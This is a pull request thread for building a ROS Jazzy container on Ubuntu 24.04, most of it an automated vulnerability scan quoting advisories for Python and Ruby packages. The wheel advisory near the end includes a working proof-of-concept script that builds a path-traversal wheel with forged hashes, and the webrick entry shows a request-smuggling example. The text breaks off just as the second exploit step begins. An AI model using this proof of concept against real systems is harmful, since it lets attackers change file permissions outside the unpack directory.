Try Building the Container with Ubuntu 24.04 and ROS Jazzy

[JLP04]

This is a test to see if the container and tools work properly when built on Ubuntu 24.04 and a newer version of ROS (Jazzy).

[github-actions]

Your image	ghcr.io/cuautodrone/cuad-ros:test
Current base image	ubuntu:24.04
Updated base image	ubuntu:26.04

[github-actions]

🔍 Vulnerabilities of ghcr.io/cuautodrone/cuad-ros:test

📦 Image Reference ghcr.io/cuautodrone/cuad-ros:test

digest	sha256:449d7e1a9072903974c5d16ffcf220665545b96ea6e6000c0c1ca58cff61b489
vulnerabilities
platform	linux/amd64
size	3.6 GB
packages	2476

📦 Base Image ubuntu:24.04

also known as	latest noble
digest	sha256:98ff7968124952e719a8a69bb3cccdd217f5fe758108ac4f21ad22e1df44d237
vulnerabilities

cryptography 41.0.7 (pypi) pkg:pypi/cryptography@41.0.7 # Dockerfile (44:46) RUN --mount=type=cache,target=/var/cache/apt,sharing=locked,id=cache-apt-$TARGETARCH-$TARGETVARIANT \ --mount=type=cache,target=/var/lib/apt,sharing=locked,id=lib-apt-$TARGETARCH-$TARGETVARIANT \ apt-get update && apt --no-install-recommends install -y curl Observable Discrepancy Affected range <42.0.0 Fixed version 42.0.0 CVSS Score 8.7 CVSS Vector CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N EPSS Score 1.147% EPSS Percentile 78th percentile Description A flaw was found in the python-cryptography package. This issue may allow a remote attacker to decrypt captured messages in TLS servers that use RSA key exchanges, which may lead to exposure of confidential or sensitive data. Insufficient Verification of Data Authenticity Affected range <=46.0.4 Fixed version 46.0.5 CVSS Score 8.2 CVSS Vector CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X EPSS Score 0.007% EPSS Percentile 0th percentile Description Vulnerability Summary The public_key_from_numbers (or EllipticCurvePublicNumbers.public_key()), EllipticCurvePublicNumbers.public_key(), load_der_public_key() and load_pem_public_key() functions do not verify that the point belongs to the expected prime-order subgroup of the curve. This missing validation allows an attacker to provide a public key point P from a small-order subgroup. This can lead to security issues in various situations, such as the most commonly used signature verification (ECDSA) and shared key negotiation (ECDH). When the victim computes the shared secret as S = [victim_private_key]P via ECDH, this leaks information about victim_private_key mod (small_subgroup_order). For curves with cofactor > 1, this reveals the least significant bits of the private key. When these weak public keys are used in ECDSA , it's easy to forge signatures on the small subgroup. Only SECT curves are impacted by this. Credit This vulnerability was discovered by: XlabAI Team of Tencent Xuanwu Lab Atuin Automated Vulnerability Discovery Engine NULL Pointer Dereference Affected range >=38.0.0 <42.0.4 Fixed version 42.0.4 CVSS Score 7.5 CVSS Vector CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H EPSS Score 0.341% EPSS Percentile 56th percentile Description If pkcs12.serialize_key_and_certificates is called with both: A certificate whose public key did not match the provided private key An encryption_algorithm with hmac_hash set (via PrivateFormat.PKCS12.encryption_builder().hmac_hash(...) Then a NULL pointer dereference would occur, crashing the Python process. This has been resolved, and now a ValueError is properly raised. Patched in pyca/cryptography#10423 NULL Pointer Dereference Affected range <42.0.2 Fixed version 42.0.2 CVSS Score 5.5 CVSS Vector CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H EPSS Score 0.236% EPSS Percentile 46th percentile Description Issue summary: Processing a maliciously formatted PKCS12 file may lead OpenSSL to crash leading to a potential Denial of Service attack Impact summary: Applications loading files in the PKCS12 format from untrusted sources might terminate abruptly. A file in PKCS12 format can contain certificates and keys and may come from an untrusted source. The PKCS12 specification allows certain fields to be NULL, but OpenSSL does not correctly check for this case. This can lead to a NULL pointer dereference that results in OpenSSL crashing. If an application processes PKCS12 files from an untrusted source using the OpenSSL APIs then that application will be vulnerable to this issue. OpenSSL APIs that are vulnerable to this are: PKCS12_parse(), PKCS12_unpack_p7data(), PKCS12_unpack_p7encdata(), PKCS12_unpack_authsafes() and PKCS12_newpass(). We have also fixed a similar issue in SMIME_write_PKCS7(). However since this function is related to writing data we do not consider it security significant. The FIPS modules in 3.2, 3.1 and 3.0 are not affected by this issue. Dependency on Vulnerable Third-Party Component Affected range >=37.0.0 <43.0.1 Fixed version 43.0.1 Description pyca/cryptography's wheels include a statically linked copy of OpenSSL. The versions of OpenSSL included in cryptography 37.0.0-43.0.0 are vulnerable to a security issue. More details about the vulnerability itself can be found in https://openssl-library.org/news/secadv/20240903.txt. If you are building cryptography source ("sdist") then you are responsible for upgrading your copy of OpenSSL. Only users installing from wheels built by the cryptography project (i.e., those distributed on PyPI) need to update their cryptography versions.

urllib3 2.0.7 (pypi) pkg:pypi/urllib3@2.0.7 # Dockerfile (54:56) RUN --mount=type=cache,target=/var/cache/apt,sharing=locked,id=cache-apt-$TARGETARCH-$TARGETVARIANT \ --mount=type=cache,target=/var/lib/apt,sharing=locked,id=lib-apt-$TARGETARCH-$TARGETVARIANT \ apt-get update && apt --no-install-recommends install -y ros-dev-tools Improper Handling of Highly Compressed Data (Data Amplification) Affected range >=1.22 <2.6.3 Fixed version 2.6.3 CVSS Score 8.9 CVSS Vector CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:H EPSS Score 0.031% EPSS Percentile 9th percentile Description Impact urllib3's streaming API is designed for the efficient handling of large HTTP responses by reading the content in chunks, rather than loading the entire response body into memory at once. urllib3 can perform decoding or decompression based on the HTTP Content-Encoding header (e.g., gzip, deflate, br, or zstd). When using the streaming API, the library decompresses only the necessary bytes, enabling partial content consumption. However, for HTTP redirect responses, the library would read the entire response body to drain the connection and decompress the content unnecessarily. This decompression occurred even before any read methods were called, and configured read limits did not restrict the amount of decompressed data. As a result, there was no safeguard against decompression bombs. A malicious server could exploit this to trigger excessive resource consumption on the client (high CPU usage and large memory allocations for decompressed data; CWE-409). Affected usages Applications and libraries using urllib3 version 2.6.2 and earlier to stream content from untrusted sources by setting preload_content=False when they do not disable redirects. Remediation Upgrade to at least urllib3 v2.6.3 in which the library does not decode content of redirect responses when preload_content=False. If upgrading is not immediately possible, disable redirects by setting redirect=False for requests to untrusted source. Improper Handling of Highly Compressed Data (Data Amplification) Affected range >=1.0 <2.6.0 Fixed version 2.6.0 CVSS Score 8.9 CVSS Vector CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:H EPSS Score 0.027% EPSS Percentile 7th percentile Description Impact urllib3's streaming API is designed for the efficient handling of large HTTP responses by reading the content in chunks, rather than loading the entire response body into memory at once. When streaming a compressed response, urllib3 can perform decoding or decompression based on the HTTP Content-Encoding header (e.g., gzip, deflate, br, or zstd). The library must read compressed data from the network and decompress it until the requested chunk size is met. Any resulting decompressed data that exceeds the requested amount is held in an internal buffer for the next read operation. The decompression logic could cause urllib3 to fully decode a small amount of highly compressed data in a single operation. This can result in excessive resource consumption (high CPU usage and massive memory allocation for the decompressed data; CWE-409) on the client side, even if the application only requested a small chunk of data. Affected usages Applications and libraries using urllib3 version 2.5.0 and earlier to stream large compressed responses or content from untrusted sources. stream(), read(amt=256), read1(amt=256), read_chunked(amt=256), readinto(b) are examples of urllib3.HTTPResponse method calls using the affected logic unless decoding is disabled explicitly. Remediation Upgrade to at least urllib3 v2.6.0 in which the library avoids decompressing data that exceeds the requested amount. If your environment contains a package facilitating the Brotli encoding, upgrade to at least Brotli 1.2.0 or brotlicffi 1.2.0.0 too. These versions are enforced by the urllib3[brotli] extra in the patched versions of urllib3. Credits The issue was reported by @Cycloctane. Supplemental information was provided by @stamparm during a security audit performed by 7ASecurity and facilitated by OSTIF. Allocation of Resources Without Limits or Throttling Affected range >=1.24 <2.6.0 Fixed version 2.6.0 CVSS Score 8.9 CVSS Vector CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:H EPSS Score 0.029% EPSS Percentile 8th percentile Description Impact urllib3 supports chained HTTP encoding algorithms for response content according to RFC 9110 (e.g., Content-Encoding: gzip, zstd). However, the number of links in the decompression chain was unbounded allowing a malicious server to insert a virtually unlimited number of compression steps leading to high CPU usage and massive memory allocation for the decompressed data. Affected usages Applications and libraries using urllib3 version 2.5.0 and earlier for HTTP requests to untrusted sources unless they disable content decoding explicitly. Remediation Upgrade to at least urllib3 v2.6.0 in which the library limits the number of links to 5. If upgrading is not immediately possible, use preload_content=False and ensure that resp.headers["content-encoding"] contains a safe number of encodings before reading the response content. URL Redirection to Untrusted Site ('Open Redirect') Affected range <2.5.0 Fixed version 2.5.0 CVSS Score 5.3 CVSS Vector CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N EPSS Score 0.018% EPSS Percentile 4th percentile Description urllib3 handles redirects and retries using the same mechanism, which is controlled by the Retry object. The most common way to disable redirects is at the request level, as follows: resp = urllib3.request("GET", "https://httpbin.org/redirect/1", redirect=False) print(resp.status) # 302 However, it is also possible to disable redirects, for all requests, by instantiating a PoolManager and specifying retries in a way that disable redirects: import urllib3 http = urllib3.PoolManager(retries=0) # should raise MaxRetryError on redirect http = urllib3.PoolManager(retries=urllib3.Retry(redirect=0)) # equivalent to the above http = urllib3.PoolManager(retries=False) # should return the first response resp = http.request("GET", "https://httpbin.org/redirect/1") However, the retries parameter is currently ignored, which means all the above examples don't disable redirects. Affected usages Passing retries on PoolManager instantiation to disable redirects or restrict their number. By default, requests and botocore users are not affected. Impact Redirects are often used to exploit SSRF vulnerabilities. An application attempting to mitigate SSRF or open redirect vulnerabilities by disabling redirects at the PoolManager level will remain vulnerable. Remediation You can remediate this vulnerability with the following steps: Upgrade to a patched version of urllib3. If your organization would benefit from the continued support of urllib3 1.x, please contact sethmichaellarson@gmail.com to discuss sponsorship or contribution opportunities. Disable redirects at the request() level instead of the PoolManager() level. Incorrect Resource Transfer Between Spheres Affected range >=2.0.0 <2.2.2 Fixed version 2.2.2 CVSS Score 4.4 CVSS Vector CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:N/A:N EPSS Score 0.263% EPSS Percentile 49th percentile Description When using urllib3's proxy support with ProxyManager, the Proxy-Authorization header is only sent to the configured proxy, as expected. However, when sending HTTP requests without using urllib3's proxy support, it's possible to accidentally configure the Proxy-Authorization header even though it won't have any effect as the request is not using a forwarding proxy or a tunneling proxy. In those cases, urllib3 doesn't treat the Proxy-Authorization HTTP header as one carrying authentication material and thus doesn't strip the header on cross-origin redirects. Because this is a highly unlikely scenario, we believe the severity of this vulnerability is low for almost all users. Out of an abundance of caution urllib3 will automatically strip the Proxy-Authorization header during cross-origin redirects to avoid the small chance that users are doing this on accident. Users should use urllib3's proxy support or disable automatic redirects to achieve safe processing of the Proxy-Authorization header, but we still decided to strip the header by default in order to further protect users who aren't using the correct approach. Affected usages We believe the number of usages affected by this advisory is low. It requires all of the following to be true to be exploited: Setting the Proxy-Authorization header without using urllib3's built-in proxy support. Not disabling HTTP redirects. Either not using an HTTPS origin server or for the proxy or target origin to redirect to a malicious origin. Remediation Using the Proxy-Authorization header with urllib3's ProxyManager. Disabling HTTP redirects using redirects=False when sending requests. Not using the Proxy-Authorization header.

setuptools 68.1.2 (pypi) pkg:pypi/setuptools@68.1.2 # Dockerfile (54:56) RUN --mount=type=cache,target=/var/cache/apt,sharing=locked,id=cache-apt-$TARGETARCH-$TARGETVARIANT \ --mount=type=cache,target=/var/lib/apt,sharing=locked,id=lib-apt-$TARGETARCH-$TARGETVARIANT \ apt-get update && apt --no-install-recommends install -y ros-dev-tools Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') Affected range <78.1.1 Fixed version 78.1.1 CVSS Score 7.7 CVSS Vector CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:P EPSS Score 0.180% EPSS Percentile 40th percentile Description Summary A path traversal vulnerability in PackageIndex was fixed in setuptools version 78.1.1 Details def _download_url(self, url, tmpdir): # Determine download filename # name, _fragment = egg_info_for_url(url) if name: while '..' in name: name = name.replace('..', '.').replace('\\', '_') else: name = "__downloaded__" # default if URL has no path contents if name.endswith('.[egg.zip](http://egg.zip/)'): name = name[:-4] # strip the extra .zip before download --> filename = os.path.join(tmpdir, name) Here: https://github.com/pypa/setuptools/blob/6ead555c5fb29bc57fe6105b1bffc163f56fd558/setuptools/package_index.py#L810C1-L825C88 os.path.join() discards the first argument tmpdir if the second begins with a slash or drive letter. name is derived from a URL without sufficient sanitization. While there is some attempt to sanitize by replacing instances of '..' with '.', it is insufficient. Risk Assessment As easy_install and package_index are deprecated, the exploitation surface is reduced. However, it seems this could be exploited in a similar fashion like GHSA-r9hx-vwmv-q579, and as described by POC 4 in GHSA-cx63-2mw6-8hw5 report: via malicious URLs present on the pages of a package index. Impact An attacker would be allowed to write files to arbitrary locations on the filesystem with the permissions of the process running the Python code, which could escalate to RCE depending on the context. References https://huntr.com/bounties/d6362117-ad57-4e83-951f-b8141c6e7ca5 pypa/setuptools#4946 Improper Control of Generation of Code ('Code Injection') Affected range <70.0.0 Fixed version 70.0.0 CVSS Score 7.5 CVSS Vector CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N EPSS Score 4.940% EPSS Percentile 89th percentile Description A vulnerability in the package_index module of pypa/setuptools versions up to 69.1.1 allows for remote code execution via its download functions. These functions, which are used to download packages from URLs provided by users or retrieved from package index servers, are susceptible to code injection. If these functions are exposed to user-controlled inputs, such as package URLs, they can execute arbitrary commands on the system. The issue is fixed in version 70.0.

protobuf 4.21.12 (pypi) pkg:pypi/protobuf@4.21.12 # Dockerfile (82:84) RUN --mount=type=cache,target=/var/cache/apt,sharing=locked,id=cache-apt-$TARGETARCH-$TARGETVARIANT \ --mount=type=cache,target=/var/lib/apt,sharing=locked,id=lib-apt-$TARGETARCH-$TARGETVARIANT \ apt-get update && apt --no-install-recommends install -y cppzmq-dev gz-harmonic && apt-mark auto cppzmq-dev Uncontrolled Recursion Affected range <5.29.6 Fixed version 6.33.5 CVSS Score 8.2 CVSS Vector CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:L EPSS Score 0.025% EPSS Percentile 7th percentile Description A denial-of-service (DoS) vulnerability exists in google.protobuf.json_format.ParseDict() in Python, where the max_recursion_depth limit can be bypassed when parsing nested google.protobuf.Any messages. Due to missing recursion depth accounting inside the internal Any-handling logic, an attacker can supply deeply nested Any structures that bypass the intended recursion limit, eventually exhausting Python’s recursion stack and causing a RecursionError. Uncontrolled Recursion Affected range <4.25.8 Fixed version 4.25.8 CVSS Score 8.2 CVSS Vector CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N EPSS Score 0.006% EPSS Percentile 0th percentile Description Summary Any project that uses Protobuf pure-Python backend to parse untrusted Protocol Buffers data containing an arbitrary number of recursive groups, recursive messages or a series of SGROUP tags can be corrupted by exceeding the Python recursion limit. Reporter: Alexis Challande, Trail of Bits Ecosystem Security Team ecosystem@trailofbits.com Affected versions: This issue only affects the pure-Python implementation of protobuf-python backend. This is the implementation when PROTOCOL_BUFFERS_PYTHON_IMPLEMENTATION=python environment variable is set or the default when protobuf is used from Bazel or pure-Python PyPi wheels. CPython PyPi wheels do not use pure-Python by default. This is a Python variant of a previous issue affecting protobuf-java. Severity This is a potential Denial of Service. Parsing nested protobuf data creates unbounded recursions that can be abused by an attacker. Proof of Concept For reproduction details, please refer to the unit tests decoder_test.py and message_test Remediation and Mitigation A mitigation is available now. Please update to the latest available versions of the following packages: protobuf-python(4.25.8, 5.29.5, 6.31.1)

rexml 3.2.5 (gem) pkg:gem/rexml@3.2.5 # Dockerfile (82:84) RUN --mount=type=cache,target=/var/cache/apt,sharing=locked,id=cache-apt-$TARGETARCH-$TARGETVARIANT \ --mount=type=cache,target=/var/lib/apt,sharing=locked,id=lib-apt-$TARGETARCH-$TARGETVARIANT \ apt-get update && apt --no-install-recommends install -y cppzmq-dev gz-harmonic && apt-mark auto cppzmq-dev Improper Restriction of Recursive Entity References in DTDs ('XML Entity Expansion') Affected range <3.3.6 Fixed version 3.3.6 CVSS Score 8.2 CVSS Vector CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N EPSS Score 1.135% EPSS Percentile 78th percentile Description Impact The REXML gem before 3.3.6 has a DoS vulnerability when it parses an XML that has many deep elements that have same local name attributes. If you need to parse untrusted XMLs with tree parser API like REXML::Document.new, you may be impacted to this vulnerability. If you use other parser APIs such as stream parser API and SAX2 parser API, this vulnerability is not affected. Patches The REXML gem 3.3.6 or later include the patch to fix the vulnerability. Workarounds Don't parse untrusted XMLs with tree parser API. References https://www.ruby-lang.org/en/news/2024/08/22/dos-rexml-cve-2024-43398/ : An announce on www.ruby-lang.org Uncontrolled Resource Consumption Affected range <3.3.3 Fixed version 3.3.3 CVSS Score 6.9 CVSS Vector CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N EPSS Score 0.661% EPSS Percentile 71st percentile Description Impact The REXML gem before 3.3.2 has a DoS vulnerability when it parses an XML that has many entity expansions with SAX2 or pull parser API. If you need to parse untrusted XMLs with SAX2 or pull parser API, you may be impacted to this vulnerability. Patches The REXML gem 3.3.3 or later include the patch to fix the vulnerability. Workarounds Don't parse untrusted XMLs with SAX2 or pull parser API. References https://www.ruby-lang.org/en/news/2008/08/23/dos-vulnerability-in-rexml/ : This is a similar vulnerability https://www.ruby-lang.org/en/news/2024/08/01/dos-rexml-cve-2024-41946/: An announce on www.ruby-lang.org Uncontrolled Resource Consumption Affected range <3.3.3 Fixed version 3.3.3 CVSS Score 6.9 CVSS Vector CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N EPSS Score 0.232% EPSS Percentile 46th percentile Description Impact The REXML gem before 3.3.2 has some DoS vulnerabilities when it parses an XML that has many specific characters such as whitespace character, >] and ]>. If you need to parse untrusted XMLs, you may be impacted to these vulnerabilities. Patches The REXML gem 3.3.3 or later include the patches to fix these vulnerabilities. Workarounds Don't parse untrusted XMLs. References GHSA-vg3r-rm7w-2xgh : This is a similar vulnerability GHSA-4xqq-m2hx-25v8 : This is a similar vulnerability https://www.ruby-lang.org/en/news/2024/08/01/dos-rexml-cve-2024-41123/: An announce on www.ruby-lang.org Uncontrolled Resource Consumption Affected range <3.3.2 Fixed version 3.3.2 CVSS Score 6.9 CVSS Vector CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N EPSS Score 7.262% EPSS Percentile 91st percentile Description Impact The REXML gem before 3.3.1 has some DoS vulnerabilities when it parses an XML that has many specific characters such as <, 0 and %>. If you need to parse untrusted XMLs, you may be impacted to these vulnerabilities. Patches The REXML gem 3.3.2 or later include the patches to fix these vulnerabilities. Workarounds Don't parse untrusted XMLs. References GHSA-vg3r-rm7w-2xgh : This is a similar vulnerability https://www.ruby-lang.org/en/news/2024/07/16/dos-rexml-cve-2024-39908/ Inefficient Regular Expression Complexity Affected range <3.3.9 Fixed version 3.3.9 CVSS Score 6.6 CVSS Vector CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:U EPSS Score 1.217% EPSS Percentile 79th percentile Description Impact The REXML gem before 3.3.9 has a ReDoS vulnerability when it parses an XML that has many digits between &# and x...; in a hex numeric character reference (&#x...;). This does not happen with Ruby 3.2 or later. Ruby 3.1 is the only affected maintained Ruby. Note that Ruby 3.1 will reach EOL on 2025-03. Patches The REXML gem 3.3.9 or later include the patch to fix the vulnerability. Workarounds Use Ruby 3.2 or later instead of Ruby 3.1. References https://www.ruby-lang.org/en/news/2024/10/28/redos-rexml-cve-2024-49761/: An announce on www.ruby-lang.org Uncontrolled Resource Consumption Affected range <3.2.7 Fixed version 3.2.7 CVSS Score 5.3 CVSS Vector CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L EPSS Score 6.902% EPSS Percentile 91st percentile Description Impact The REXML gem before 3.2.6 has a DoS vulnerability when it parses an XML that has many >s in an attribute value. If you need to parse untrusted XMLs, you may be impacted to this vulnerability. Patches The REXML gem 3.2.7 or later include the patch to fix this vulnerability. Workarounds Don't parse untrusted XMLs. References https://www.ruby-lang.org/en/news/2024/05/16/dos-rexml-cve-2024-35176/

webrick 1.8.1 (gem) pkg:gem/webrick@1.8.1 # Dockerfile (82:84) RUN --mount=type=cache,target=/var/cache/apt,sharing=locked,id=cache-apt-$TARGETARCH-$TARGETVARIANT \ --mount=type=cache,target=/var/lib/apt,sharing=locked,id=lib-apt-$TARGETARCH-$TARGETVARIANT \ apt-get update && apt --no-install-recommends install -y cppzmq-dev gz-harmonic && apt-mark auto cppzmq-dev Inconsistent Interpretation of HTTP Requests ('HTTP Request/Response Smuggling') Affected range <=1.8.1 Fixed version 1.8.2 CVSS Score 7.5 CVSS Vector CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N EPSS Score 0.108% EPSS Percentile 29th percentile Description An issue was discovered in the WEBrick toolkit through 1.8.1 for Ruby. It allows HTTP request smuggling by providing both a Content-Length header and a Transfer-Encoding header, e.g., "GET /admin HTTP/1.1\r\n" inside of a "POST /user HTTP/1.1\r\n" request. NOTE: the supplier's position is "Webrick should not be used in production." Inconsistent Interpretation of HTTP Requests ('HTTP Request/Response Smuggling') Affected range <1.8.2 Fixed version 1.8.2 CVSS Score 6.5 CVSS Vector CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:H/A:N EPSS Score 0.057% EPSS Percentile 18th percentile Description Ruby WEBrick read_header HTTP Request Smuggling Vulnerability. This vulnerability allows remote attackers to smuggle arbitrary HTTP requests on affected installations of Ruby WEBrick. This issue is exploitable when the product is deployed behind an HTTP proxy that fulfills specific conditions. The specific flaw exists within the read_headers method. The issue results from the inconsistent parsing of terminators of HTTP headers. An attacker can leverage this vulnerability to smuggle arbitrary HTTP requests. Was ZDI-CAN-21876.

pillow 10.2.0 (pypi) pkg:pypi/pillow@10.2.0 # Dockerfile (64:66) RUN --mount=type=cache,target=/var/cache/apt,sharing=locked,id=cache-apt-$TARGETARCH-$TARGETVARIANT \ --mount=type=cache,target=/var/lib/apt,sharing=locked,id=lib-apt-$TARGETARCH-$TARGETVARIANT \ apt-get update && apt --no-install-recommends install -y ros-jazzy-desktop Buffer Copy without Checking Size of Input ('Classic Buffer Overflow') Affected range <10.3.0 Fixed version 10.3.0 CVSS Score 7.3 CVSS Vector CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N EPSS Score 0.284% EPSS Percentile 51st percentile Description In _imagingcms.c in Pillow before 10.3.0, a buffer overflow exists because strcpy is used instead of strncpy.

mpmath 0.0.0 (pypi) pkg:pypi/mpmath@0.0.0 # Dockerfile (64:66) RUN --mount=type=cache,target=/var/cache/apt,sharing=locked,id=cache-apt-$TARGETARCH-$TARGETVARIANT \ --mount=type=cache,target=/var/lib/apt,sharing=locked,id=lib-apt-$TARGETARCH-$TARGETVARIANT \ apt-get update && apt --no-install-recommends install -y ros-jazzy-desktop Allocation of Resources Without Limits or Throttling Affected range <1.3.0 Fixed version 1.3.0 CVSS Score 8.7 CVSS Vector CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N EPSS Score 0.949% EPSS Percentile 76th percentile Description A Regular Expression Denial of Service (ReDOS) vulnerability was discovered in Mpmath v1.0.0 when the mpmathify function is called.

brotli 1.1.0 (pypi) pkg:pypi/brotli@1.1.0 # Dockerfile (64:66) RUN --mount=type=cache,target=/var/cache/apt,sharing=locked,id=cache-apt-$TARGETARCH-$TARGETVARIANT \ --mount=type=cache,target=/var/lib/apt,sharing=locked,id=lib-apt-$TARGETARCH-$TARGETVARIANT \ apt-get update && apt --no-install-recommends install -y ros-jazzy-desktop Uncontrolled Resource Consumption Affected range <=1.1.0 Fixed version 1.2.0 CVSS Score 7.5 CVSS Vector CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H EPSS Score 0.024% EPSS Percentile 6th percentile Description Scrapy versions up to 2.13.3 are vulnerable to a denial of service (DoS) attack due to a flaw in its brotli decompression implementation. The protection mechanism against decompression bombs fails to mitigate the brotli variant, allowing remote servers to crash clients with less than 80GB of available memory. This occurs because brotli can achieve extremely high compression ratios for zero-filled data, leading to excessive memory consumption during decompression. Mitigation for this vulnerability needs security enhancement added in brotli v1.2.0.

wheel 0.42.0 (pypi) pkg:pypi/wheel@0.42.0 # Dockerfile (128:130) RUN --mount=type=cache,target=/var/cache/apt,sharing=locked,id=cache-apt-$TARGETARCH-$TARGETVARIANT \ --mount=type=cache,target=/var/lib/apt,sharing=locked,id=lib-apt-$TARGETARCH-$TARGETVARIANT \ sudo apt-get update && sudo apt --no-install-recommends install -y python3-pip Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') Affected range >=0.40.0 <=0.46.1 Fixed version 0.46.2 CVSS Score 7.1 CVSS Vector CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H EPSS Score 0.008% EPSS Percentile 1st percentile Description Summary Vulnerability Type: Path Traversal (CWE-22) leading to Arbitrary File Permission Modification. Root Cause Component: wheel.cli.unpack.unpack function. Affected Packages: wheel (Upstream source) setuptools (Downstream, vendors wheel) Severity: High (Allows modifying system file permissions). Details The vulnerability exists in how the unpack function handles file permissions after extraction. The code blindly trusts the filename from the archive header for the chmod operation, even though the extraction process itself might have sanitized the path. # Vulnerable Code Snippet (present in both wheel and setuptools/_vendor/wheel) for zinfo in wf.filelist: wf.extract(zinfo, destination) # (1) Extraction is handled safely by zipfile # (2) VULNERABILITY: # The 'permissions' are applied to a path constructed using the UNSANITIZED 'zinfo.filename'. # If zinfo.filename contains "../", this targets files outside the destination. permissions = zinfo.external_attr >> 16 & 0o777 destination.joinpath(zinfo.filename).chmod(permissions) PoC I have confirmed this exploit works against the unpack function imported from setuptools._vendor.wheel.cli.unpack. Prerequisites: pip install setuptools Step 1: Generate the Malicious Wheel (gen_poc.py) This script creates a wheel that passes internal hash validation but contains a directory traversal payload in the file list. import zipfile import hashlib import base64 import os def urlsafe_b64encode(data): """ Helper function to encode data using URL-safe Base64 without padding. Required by the Wheel file format specification. """ return base64.urlsafe_b64encode(data).rstrip(b'=').decode('ascii') def get_hash_and_size(data_bytes): """ Calculates SHA-256 hash and size of the data. These values are required to construct a valid 'RECORD' file, which is used by the 'wheel' library to verify integrity. """ digest = hashlib.sha256(data_bytes).digest() hash_str = "sha256=" + urlsafe_b64encode(digest) return hash_str, str(len(data_bytes)) def create_evil_wheel_v4(filename="evil-1.0-py3-none-any.whl"): print(f"[Generator V4] Creating 'Authenticated' Malicious Wheel: {filename}") # 1. Prepare Standard Metadata Content # These are minimal required contents to make the wheel look legitimate. wheel_content = b"Wheel-Version: 1.0\nGenerator: bdist_wheel (0.37.1)\nRoot-Is-Purelib: true\nTag: py3-none-any\n" metadata_content = b"Metadata-Version: 2.1\nName: evil\nVersion: 1.0\nSummary: PoC Package\n" # 2. Define Malicious Payload (Path Traversal) # The content doesn't matter, but the path does. payload_content = b"PWNED by Path Traversal" # [ATTACK VECTOR]: Target a file OUTSIDE the extraction directory using '../' # The vulnerability allows 'chmod' to affect this path directly. malicious_path = "../../poc_target.txt" # 3. Calculate Hashes for Integrity Check Bypass # The 'wheel' library verifies if the file hash matches the RECORD entry. # To bypass this check, we calculate the correct hash for our malicious file. wheel_hash, wheel_size = get_hash_and_size(wheel_content) metadata_hash, metadata_size = get_hash_and_size(metadata_content) payload_hash, payload_size = get_hash_and_size(payload_content) # 4. Construct the 'RECORD' File # The RECORD file lists all files in the wheel with their hashes. # CRITICAL: We explicitly register the malicious path ('../../poc_target.txt') here. # This tricks the 'wheel' library into treating the malicious file as a valid, verified component. record_lines = [ f"evil-1.0.dist-info/WHEEL,{wheel_hash},{wheel_size}", f"evil-1.0.dist-info/METADATA,{metadata_hash},{metadata_size}", f"{malicious_path},{payload_hash},{payload_size}", # <-- Authenticating the malicious path "evil-1.0.dist-info/RECORD,," ] record_content = "\n".join(record_lines).encode('utf-8') # 5. Build the Zip File with zipfile.ZipFile(filename, "w") as zf: # Write standard metadata files zf.writestr("evil-1.0.dist-info/WHEEL", wheel_content) zf.writestr("evil-1.0.dist-info/METADATA", metadata_content) zf.writestr("evil-1.0.dist-info/RECORD", record_content) # [EXPLOIT CORE]: Manually craft ZipInfo for the malicious file # We need to set specific permission bits to trigger the vulnerability. zinfo = zipfile.ZipInfo(malicious_path) # Set external attributes to 0o777 (rwxrwxrwx) # Upper 16 bits: File type (0o100000 = Regular File) # Lower 16 bits: Permissions (0o777 = World Writable) # The vulnerable 'unpack' function will blindly apply this '777' to the system file. zinfo.external_attr = (0o100000 | 0o777) << 16 zf.writestr(zinfo, payload_content) print("[Generator V4] Done. Malicious file added to RECORD and validation checks should pass.") if __name__ == "__main__": create_evil_wheel_v4() Step 2: Run the Exploit (exploit.py) from pathlib import Path import sys # 